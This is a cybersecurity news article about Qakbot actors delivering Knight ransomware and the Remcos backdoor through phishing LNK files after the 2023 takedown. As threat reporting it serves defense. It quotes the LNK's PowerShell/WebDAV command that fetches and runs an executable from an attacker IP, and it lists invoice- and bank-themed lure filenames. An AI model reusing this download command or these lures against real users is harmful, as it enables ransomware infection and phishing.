Friday, December 1, 2023

Qakbot Threat Actors Deliver Knight Ransomware & Remcos Via LNK Files

Qakbot’s infrastructure and cryptocurrency assets were seized by government authorities in an operation in August 2023 with the assistance of international allies, raising concerns about the affiliates of Qakbot.

Talos researchers moderately believe Qakbot threat actors remain active, launching a recent campaign with Cyclops/Ransom Knight ransomware and the Remcos backdoor, tracked through LNK file metadata connections to past campaigns.

Talos researchers used LNK file metadata to trace threat actors, linking the “AA” and “BB” campaigns in January 2023. 

After their report, Qakbot actors in the “AA,” “BB,” and “Obama” campaigns began removing LNK file metadata to evade detection and tracking.


Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

Technical analysis

New LNK files from the same system were discovered by Talos in August 2023, leading to a network share that contained the ransomware Ransom Knight. According to analysis, they direct users to Powershell.exe and pass parameters for the subsequent download step:-

  • -c “explorer ‘\\89[.]23[.]96[.]203@80\333\'”; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89[.]23[.]96[.]203@80\333\information.exe

Executing Explorer.exe to access remote IP 89[.]23[.]96[.]203 via WebDAV (port 80) might evade command line detection for PowerShell remote executable downloads (T1105). 

These LNK filenames hint at urgent financial topics, indicating phishing in Qakbot campaigns. Here below, we have mentioned all the filenames of the LNK files:-

  • ATTENTION-Invoice-29-August.docx.lnk
  • bank transfer request.lnk
  • Booking info.pdf.lnk
  • Fattura NON pagata Agosto 2023.docx.lnk
  • FRAUD bank transfer report.pdf.lnk
  • invoice OTP bank.pdf.lnk
  • MANDATORY-Invoice-28-August.docx.lnk
  • NOT-paid-Invoice-26-August.pdf.lnk
  • Nuove coordinate bancarie e IBAN 2023.docx.lnk
  • Nuove coordinate bancarie e IBAN 2023.img.lnk
  • Pay-Invoices-29-August.pdf.lnk
  • URGENT-Invoice-27-August.docx.lnk

Italian filenames hint at regional targeting, while LNK files in Zip archives accompany XLL files, typically associated with Excel add-ins and similar icons.

The LNK file fetches the Ransom Knight payload from remote IP 89[.]23[.]96[.]203 via WebDAV, marking an evolved version of the Cyclops ransomware, announced by its operator in May 2023

Experts suggest that Qakbot threat actors are customers, not operators, of the ransomware service. The FBI operation in August 2023 mainly targeted control servers, leaving email delivery unaffected. 

While Qakbot distribution paused post-takedown, the threat could resurge if the operators rebuild their infrastructure.

Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.


Latest articles

Cactus Ransomware Exploiting Qlik Sense code execution Vulnerability

A new Cactus Ransomware was exploited in the code execution vulnerability to Qlik Sense...

Hackers Bypass Antivirus with ScrubCrypt Tool to Install RedLine Malware

The ScrubCrypt obfuscation tool has been discovered to be utilized in attacks to disseminate the RedLine Stealer...

Hotel’s Hacked Logins Let Attacker Steal Guest Credit Cards

According to a recent report by Secureworks, a well-planned and advanced phishing attack was...

Critical Zoom Vulnerability Let Attackers Take Over Meetings

Zoom, the most widely used video conferencing platform has been discovered with a critical...

Hackers Using Weaponized Invoice to Deliver LUMMA Malware

Hackers use weaponized invoices to exploit trust in financial transactions, embedding malware or malicious...

US-Seized Crypto Currency Mixer Used by North Korean Lazarus Hackers

The U.S. Treasury Department sanctioned the famous cryptocurrency mixer Sinbad after it was claimed...

CISA Warns Hackers Exploiting Wastewater Systems Logic Controllers

In a disconcerting turn of events, cyber threat actors have set their sights on...
Tushar Subhra Dutta
Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

API Attack Simulation Webinar

Live API Attack Simulation

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked.The session will cover:an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Related Articles